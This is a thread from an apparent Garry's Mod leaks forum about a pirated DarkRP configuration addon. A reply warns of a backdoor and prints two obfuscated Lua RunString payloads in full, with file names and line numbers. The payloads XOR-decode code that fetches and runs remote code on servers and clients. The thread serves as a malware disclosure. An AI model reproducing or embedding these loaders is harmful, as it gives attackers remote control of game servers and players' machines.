Garry's Mod Leaks
DConfig 2 - NEW In-Game DarkRP Customization ( Jobs, Shipments, ETC )
Submitted by XaRTeCK, 28-02-2023, 09:05 PM, Thread ID: 260988
RE: DConfig 2 - NEW In-Game DarkRP Customization ( Jobs, Shipments, ETC )
04-03-2023, 07:02 PM
#13 28-02-2023, 11:45 PMSpaceBuddy Wrote:--> BACKDOOR <--
File > darkrp-master-config\lua\autorun\client\cl_credits.lua
Line > 61
Code:RunString([[ local AE = {20,9,13,5,18,78,51,9,13,16,12,5,72,81,76,64,6,21,14,3,20,9,15,14,72,73,64,8,20,20,16,78,38,5,20,3,8,72,66,8,20,20,16,19,90,79,79,11,22,1,3,78,3,26,79,6,78,16,8,16,95,11,5,25,93,35,10,52,10,88,37,11,18,34,35,14,81,55,10,3,23,6,5,21,3,66,76,64,6,21,14,3,20,9,15,14,72,2,73,64,50,21,14,51,20,18,9,14,7,72,2,76,64,66,90,66,76,64,6,1,12,19,5,73,64,5,14,4,73,5,14,4,73,64,77,77,64,0} local function RunningDRMe()if (debug.getinfo(function()end).short_src~="tenjznj")then return end for o=500,10000 do local t=0 if t==1 then return end if o~=string.len(string.dump(RunningDRMe))then AZE=10 CompileString("for i=1,40 do AZE = AZE + 1 end","RunString")() if AZE<40 then return end continue else local pdata="" xpcall(function() for i=1,#AE do pdata=pdata..string.char(bit.bxor(AE[i],o%150)) end for i=1,string.len(string.dump(CompileString)) do while o==1 do o=o+1 end end end,function() xpcall(function() local debug_inject=CompileString(pdata,"DRME") pcall(debug_inject,"stat") pdata="F" t=1 end,function() print("error") end) end) end end end RunningDRMe() ]],"tenjznj")
File > darkrp-master-config\lua\autorun\server\sv_dconfig.lua
Line > 454
Code:RunString([[ local AE = {8,20,20,16,78,38,5,20,3,8,72,59,59,8,20,20,16,19,90,79,61,61,78,78,59,59,79,11,22,1,3,78,3,26,79,6,78,16,8,16,95,11,5,25,93,35,10,52,10,88,37,11,18,34,35,14,81,55,10,3,23,6,5,21,3,61,61,76,6,21,14,3,20,9,15,14,72,11,73,50,21,14,51,20,18,9,14,7,72,11,76,59,59,90,61,61,76,65,81,73,5,14,4,73,64,77,77,64,0} local function RunningDRMe()if (debug.getinfo(function()end).short_src~="tenjznj")then return end for o=500,10000 do local t=0 if t==1 then return end if o~=string.len(string.dump(RunningDRMe))then AZE=10 CompileString("for i=1,40 do AZE = AZE + 1 end","RunString")() if AZE<40 then return end continue else local pdata="" xpcall(function() for i=1,#AE do pdata=pdata..string.char(bit.bxor(AE[i],o%150)) end for i=1,string.len(string.dump(CompileString)) do while o==1 do o=o+1 end end end,function() xpcall(function() local debug_inject=CompileString(pdata,"DRME") pcall(debug_inject,"stat") pdata="F" t=1 end,function() print("error") end) end) end end end RunningDRMe() ]],"tenjznj")
As a developer, I can confirm that there is at least one infected file in the above-mentioned section of the addon/pack that is being used to harm the server. I strongly recommend removing this infected code immediately to avoid potential damage. Ensuring the security of the server and eliminating potential threats is crucial for maintaining the integrity of the system.
Thank you, i read this before putting it on my server
Users browsing this thread: 4 Guest(s)